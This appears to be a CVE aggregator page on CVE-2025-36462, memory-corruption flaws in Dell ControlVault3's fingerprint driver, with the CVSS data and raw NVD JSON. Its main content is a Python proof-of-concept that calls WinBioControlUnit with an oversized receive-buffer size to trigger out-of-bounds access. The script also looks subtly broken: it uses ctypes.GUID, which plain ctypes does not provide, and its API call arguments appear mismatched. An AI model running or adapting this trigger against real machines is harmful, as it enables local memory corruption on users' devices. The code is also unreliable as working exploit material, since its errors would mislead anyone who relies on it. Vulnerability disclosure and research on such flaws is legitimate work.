Security Vulnerability Report
中文
CVE-2025-36462 CVSS 7.3 HIGH

CVE-2025-36462

Published: 2025-11-17 23:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 3 (`WBIO_USH_CREATE_CHALLENGE`) with an invalid `ReceiveBuferSize`.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-36462 PoC - Dell ControlVault WBDI Driver Out-of-Bounds Access # Note: This is a proof-of-concept demonstrating the vulnerable code path # Actual exploitation requires specific device access and Windows environment import ctypes from ctypes import wintypes # Windows API definitions WINBIO_FRAMEWORK = ctypes.windll.winbio # WBDI Constants WBIO_USH_CREATE_CHALLENGE = 3 WINBIO_TYPE_FINGERPRINT = 0x00000001 WINBIO_POOL_SYSTEM = 0 class WINBIO_UNIT_SCHEMA(ctypes.Structure): _fields_ = [ ('UnitId', wintypes.ULONG), ('PoolType', wintypes.ULONG), ('BiometricFactor', wintypes.ULONG), ('DeviceInstanceId', ctypes.c_wchar * 260), ('SensorSubType', wintypes.ULONG), ('SensorCapabilities', wintypes.ULONG), ('SupportedFormats', ctypes.POINTER(ctypes.c_void_p)), ('VendorData', ctypes.c_void_p), ('VendorDataSize', wintypes.ULONG) ] def trigger_vulnerable_code_path(): """ Trigger the vulnerable WinBioControlUnit call with invalid ReceiveBufferSize This demonstrates the vulnerability mechanism """ try: # Initialize WBDI session session_handle = wintypes.HANDLE() template_guid = ctypes.GUID() unit_id = wintypes.ULONG() # Open session - requires Dell ControlVault device hr = WINBIO_FRAMEWORK.WinBioOpenSession( WINBIO_TYPE_FINGERPRINT, WINBIO_POOL_SYSTEM, 0, # Flags None, 0, # Database count None, # Database providers ctypes.byref(session_handle) ) if hr != 0: print(f"[-] Failed to open session: 0x{hr:X}") return False print("[+] Session opened successfully") # Prepare malicious parameters # The vulnerability is triggered when ReceiveBufferSize is invalid control_code = WBIO_USH_CREATE_CHALLENGE # 3 input_buffer = ctypes.create_string_buffer(b"\x00" * 64) input_size = 64 # Invalid receive buffer size - this triggers the vulnerability # Size should match expected size but we provide invalid value receive_buffer_size = 0xFFFFFFFF # Invalid size receive_buffer = ctypes.create_string_buffer(1) # Undersized buffer # Call WinBioControlUnit with vulnerable parameters hr = WINBIO_FRAMEWORK.WinBioControlUnit( session_handle, WINBIO_TYPE_FINGERPRINT, 0, # Unit ID control_code, input_buffer, input_size, receive_buffer, receive_buffer_size, ctypes.byref(wintypes.ULONG(receive_buffer_size)) ) # Check result - may succeed partially causing memory corruption if hr == 0x80070057: # E_INVALIDARG print("[-] Invalid arguments rejected (system may be patched)") elif hr == 0x800706BE: # RPC_Server_Unavailable print("[-] Driver communication error (device not present)") else: print(f"[*] Call returned: 0x{hr:X}") if hr == 0: print("[!] Potential out-of-bounds access occurred") # Cleanup WINBIO_FRAMEWORK.WinBioCloseSession(session_handle) except Exception as e: print(f"[-] Error: {e}") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-36462 PoC - Dell ControlVault WBDI Driver") print("Vulnerability: Out-of-Bounds Read/Write") print("=" * 60) trigger_vulnerable_code_path()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36462", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:53.337", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with the ControlCode 3 (`WBIO_USH_CREATE_CHALLENGE`) with an invalid `ReceiveBuferSize`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.